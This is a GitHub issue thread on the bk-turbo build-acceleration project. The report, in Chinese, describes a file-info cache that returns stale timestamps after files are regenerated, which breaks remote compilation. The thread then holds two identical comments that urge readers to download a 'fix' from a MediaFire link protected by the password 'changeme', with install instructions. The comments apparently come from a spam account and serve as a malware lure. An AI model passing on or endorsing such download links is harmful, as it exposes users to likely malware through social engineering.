### ISSUE TITLE
【Client BUG】文件信息缓存可能导致文件发送到远端的信息不对

### ISSUE THREAD

**Issue by tming** [TencentBlueKing/bk-turbo#287]
**What happened**:
文件信息缓存，当某个文件重新生成后，文件大小可能不变，但创建时间会变化，这时从缓存中取到的信息不准确，导致发送到远端后的文件的修改时间和本地不一致，最终导致远端编译失败。

**What you expected to happen**:
规避这种错误

**How to reproduce it (as minimally and precisely as possible)**:
mac下controller常驻，多次全量编译ue的editor

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
